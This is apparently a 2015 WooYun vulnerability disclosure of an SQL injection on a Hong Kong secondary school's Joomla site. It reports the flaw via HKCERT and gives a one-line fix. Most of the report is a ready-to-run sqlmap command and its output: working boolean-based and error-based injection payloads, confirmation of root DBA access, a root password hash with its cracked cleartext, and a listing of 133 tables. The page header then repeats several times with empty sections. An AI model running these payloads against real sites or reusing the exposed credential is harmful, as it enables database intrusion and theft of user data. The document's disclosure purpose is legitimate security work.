香港啟思中學某處存在SQL插入攻擊（DBA權限/root弱密碼泄露/133個表）（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0149238

漏洞标题：香港啟思中學某處存在SQL插入攻擊（DBA權限/root弱密碼泄露/133個表）（香港地區）

漏洞作者：路人甲

提交时间：2015-10-25 10:07

修复时间：2015-12-12 11:48

公开时间：2015-12-12 11:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-25：细节已通知厂商并且等待厂商处理中
2015-10-28：厂商已经确认，细节仅向厂商公开
2015-11-07：细节向核心白帽子及相关领域专家公开
2015-11-17：细节向普通白帽子公开
2015-11-27：细节向实习白帽子公开
2015-12-12：细节向公众公开

简要描述：

香港啟思中學某處存在SQL插入攻擊（DBA權限/root弱密碼泄露/133個表）

详细说明：

測試地址：http://**.**.**.**/index.php?option=com_content&view=article&id=16&Itemid=96

python sqlmap.py -u "http://**.**.**.**/index.php?option=com_content&view=article&id=16&Itemid=96" -p id --technique=BE --random-agent --batch --current-user --is-dba --users --passwords

漏洞证明：

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_content&view=article&id=16 RLIKE (SELECT (CASE WHEN (4995=4995) THEN 16 ELSE 0x28 END))&Itemid=96
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_content&view=article&id=16 AND (SELECT 6720 FROM(SELECT COUNT(*),CONCAT(0x716b766b71,(SELECT (ELT(6720=6720,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=96
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.4.16, Apache 2.2.15
back-end DBMS: MySQL 5.0
current user:    'root@localhost'
current user is DBA:    True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_content&view=article&id=16 RLIKE (SELECT (CASE WHEN (4995=4995) THEN 16 ELSE 0x28 END))&Itemid=96
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_content&view=article&id=16 AND (SELECT 6720 FROM(SELECT COUNT(*),CONCAT(0x716b766b71,(SELECT (ELT(6720=6720,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=96
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.4.16, Apache 2.2.15
back-end DBMS: MySQL 5.0
database management system users [5]:
[*] ''@'localhost'
[*] ''@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
database management system users password hashes:
[*] root [2]:
    password hash: *EB87920C7207E533743E4C5D8C6AF2CC61C71B35
    clear-text password: maintain
    password hash: NULL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_content&view=article&id=16 RLIKE (SELECT (CASE WHEN (4995=4995) THEN 16 ELSE 0x28 END))&Itemid=96
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_content&view=article&id=16 AND (SELECT 6720 FROM(SELECT COUNT(*),CONCAT(0x716b766b71,(SELECT (ELT(6720=6720,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=96
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.4.16, Apache 2.2.15
back-end DBMS: MySQL 5.0
available databases [4]:
[*] information_schema
[*] mysql
[*] schoolweb
[*] test
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_content&view=article&id=16 RLIKE (SELECT (CASE WHEN (4995=4995) THEN 16 ELSE 0x28 END))&Itemid=96
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_content&view=article&id=16 AND (SELECT 6720 FROM(SELECT COUNT(*),CONCAT(0x716b766b71,(SELECT (ELT(6720=6720,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=96
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.4.16, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: schoolweb
[133 tables]
+-------------------------------+
| x3sug_ak_acl                  |
| x3sug_ak_profiles             |
| x3sug_ak_stats                |
| x3sug_ak_storage              |
| x3sug_assets                  |
| x3sug_associations            |
| x3sug_banner                  |
| x3sug_banner_clients          |
| x3sug_banner_tracks           |
| x3sug_bannerclient            |
| x3sug_banners                 |
| x3sug_bannertrack             |
| x3sug_categories              |
| x3sug_contact_details         |
| x3sug_content                 |
| x3sug_content_frontpage       |
| x3sug_content_rating          |
| x3sug_content_types           |
| x3sug_contentitem_tag_map     |
| x3sug_core_log_searches       |
| x3sug_datasafe_pro            |
| x3sug_eweather_cache          |
| x3sug_eweather_locations      |
| x3sug_eweather_prefs          |
| x3sug_eweather_profiles       |
| x3sug_export_categories       |
| x3sug_export_content          |
| x3sug_export_sections         |
| x3sug_extensions              |
| x3sug_fabanner                |
| x3sug_fabannerin              |
| x3sug_fabannerlang            |
| x3sug_fabannerlocation        |
| x3sug_faclient                |
| x3sug_falink                  |
| x3sug_falocation              |
| x3sug_fasize                  |
| x3sug_finder_filters          |
| x3sug_finder_links            |
| x3sug_finder_links_terms0     |
| x3sug_finder_links_terms1     |
| x3sug_finder_links_terms2     |
| x3sug_finder_links_terms3     |
| x3sug_finder_links_terms4     |
| x3sug_finder_links_terms5     |
| x3sug_finder_links_terms6     |
| x3sug_finder_links_terms7     |
| x3sug_finder_links_terms8     |
| x3sug_finder_links_terms9     |
| x3sug_finder_links_termsa     |
| x3sug_finder_links_termsb     |
| x3sug_finder_links_termsc     |
| x3sug_finder_links_termsd     |
| x3sug_finder_links_termse     |
| x3sug_finder_links_termsf     |
| x3sug_finder_taxonomy         |
| x3sug_finder_taxonomy_map     |
| x3sug_finder_terms            |
| x3sug_finder_terms_common     |
| x3sug_finder_tokens           |
| x3sug_finder_tokens_aggregate |
| x3sug_finder_types            |
| x3sug_flexbanners             |
| x3sug_flexbannersclient       |
| x3sug_flexbannersin           |
| x3sug_flexbannerslink         |
| x3sug_flexbannerslocations    |
| x3sug_flexbannerssize         |
| x3sug_gcalendar               |
| x3sug_jce_extensions          |
| x3sug_jce_groups              |
| x3sug_jce_plugins             |
| x3sug_jev_users               |
| x3sug_jevents_categories      |
| x3sug_jevents_exception       |
| x3sug_jevents_icsfile         |
| x3sug_jevents_repbyday        |
| x3sug_jevents_repetition      |
| x3sug_jevents_rrule           |
| x3sug_jevents_vevdetail       |
| x3sug_jevents_vevent          |
| x3sug_k2_attachments          |
| x3sug_k2_categories           |
| x3sug_k2_comments             |
| x3sug_k2_extra_fields         |
| x3sug_k2_extra_fields_groups  |
| x3sug_k2_items                |
| x3sug_k2_rating               |
| x3sug_k2_tags                 |
| x3sug_k2_tags_xref            |
| x3sug_k2_user_groups          |
| x3sug_k2_users                |
| x3sug_languages               |
| x3sug_menu                    |
| x3sug_menu_types              |
| x3sug_messages                |
| x3sug_messages_cfg            |
| x3sug_migration_configuration |
| x3sug_modules                 |
| x3sug_modules_menu            |
| x3sug_newsfeeds               |
| x3sug_overrider               |
| x3sug_postinstall_messages    |
| x3sug_redirect_links          |
| x3sug_rsbanners_ad            |
| x3sug_rsbanners_adcat         |
| x3sug_schemas                 |
| x3sug_sections                |
| x3sug_sembookings             |
| x3sug_seminar                 |
| x3sug_semnumber               |
| x3sug_session                 |
| x3sug_stats_agents            |
| x3sug_swmenu_config           |
| x3sug_swmenu_extended         |
| x3sug_swmenufree_styles       |
| x3sug_tags                    |
| x3sug_template_styles         |
| x3sug_ucm_base                |
| x3sug_ucm_content             |
| x3sug_ucm_history             |
| x3sug_update_sites            |
| x3sug_update_sites_extensions |
| x3sug_updates                 |
| x3sug_user_keys               |
| x3sug_user_notes              |
| x3sug_user_profiles           |
| x3sug_user_usergroup_map      |
| x3sug_usergroups              |
| x3sug_users                   |
| x3sug_viewlevels              |
| x3sug_weblinks                |
| x3sug_wf_profiles             |
+-------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_content&view=article&id=16 RLIKE (SELECT (CASE WHEN (4995=4995) THEN 16 ELSE 0x28 END))&Itemid=96
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_content&view=article&id=16 AND (SELECT 6720 FROM(SELECT COUNT(*),CONCAT(0x716b766b71,(SELECT (ELT(6720=6720,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=96
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.4.16, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: schoolweb
Table: x3sug_user_keys
[7 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| time     | varchar(200)     |
| id       | int(10) unsigned |
| invalid  | tinyint(4)       |
| series   | varchar(255)     |
| token    | varchar(255)     |
| uastring | varchar(255)     |
| user_id  | varchar(255)     |
+----------+------------------+

修复方案：

增加過濾。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-10-28 11:47

厂商回复：

已將事件通知有關機構

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0149238

漏洞标题：香港啟思中學某處存在SQL插入攻擊（DBA權限/root弱密碼泄露/133個表）（香港地區）

相关厂商：香港啟思中學

漏洞作者：路人甲

提交时间：2015-10-25 10:07

修复时间：2015-12-12 11:48

公开时间：2015-12-12 11:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0149238

漏洞标题：香港啟思中學某處存在SQL插入攻擊（DBA權限/root弱密碼泄露/133個表）（香港地區）

相关厂商：香港啟思中學

漏洞作者： 路人甲

提交时间：2015-10-25 10:07

修复时间：2015-12-12 11:48

公开时间：2015-12-12 11:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0149238"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云